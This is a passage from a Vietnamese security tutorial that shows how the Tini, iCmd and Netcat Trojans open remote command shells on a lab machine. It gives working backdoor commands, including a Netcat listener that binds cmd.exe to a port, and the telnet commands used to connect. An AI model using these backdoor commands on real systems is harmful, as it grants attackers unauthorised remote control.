- Mục đích của những kẻ viết ra những Trojans:
5. Sửdụng một số loại Trojan
Với mục đích của bài viết để hiểu về Trojan, sử dụng Trojan là một trong những nội dung cơ bản của nghiên cứu về bảo mật. Khi biết cách sử dụng và cách hoạt động của các loại Trojan ta có thể từ đó đưa ra các giải pháp an ninh mạng cho doanh nghiệp của mình cũng như những dữ liệu quan trọng của chúng ta. Trong phần này chúng ta sẽ làm quen những loại Trojan sau: - Tini
- iCmd - Netcat - HTTP RAT
5.1. Trojan Tini
Bất kỳ một máy tính nào nếu bị nhiễm Trojan này đều cho phép Telnet qua Port 7777 không cần bất kỳ thông tin xác thực nào.
- Để Trojan này nhiễm vào hệ thống thì chỉ cần chạy một lần hoặc Enter file đó là OK mọi thứ đã hoàn tất và đợi những thông tin Telnet tới port 7777. - Trên máy 192.168.1.33 đã chạy file tini.exe giờ ta đứng trên bất kỳ máy nào cũng có thể dùng lệnh: Telnet 192.168.1.33 7777 là có thể console vào được máy đó.
5.2. iCmd Trojan
Tương tự như Tini Trojan nhưng khác một điều đó là cho phép lựa chọn port để telnet và Password truy cập vào máy bị nhiễm trojan này.
VD: Máy bị nhiễm Trojan chạy file iCmd.exe với câu lệnh - iCmd.exe vne 8080
Có nghĩa máy này enable telnet trên port 8080 và password là "vne" Trong ví dụ này ta để file: iCmd.exe tại thư mục vnexperts.net trên ổ C:\
- Trên máy khác ta có thể telnet tới máy này với câu lệnh: - Telnet port
- Như ví dụ trên ta gõ: telnet 192.168.1.33 8080
Hệ thống bắt ta nhập password ta gõ vne vào và Enter
5.3. Netcat Trojan.
Trojan này cho phép chúng ta lựa chọn khá nhiều Options như Port, chạy chế độ ẩn, cho phép telnet …..
Để chạy Trojan này ta gõ câu lệnh: Nc.exe –L –p -t –e
-L là hoạt động ở chế độ nghe -p là Port sử dụng để nghe. -t cho phép sử dụng Telnet
-e chạy một chương trình nào đó. Trên ví dụ này tôi chạy với câu lệnh - Nc.exe –L –p 8800 –t –e cmd.exe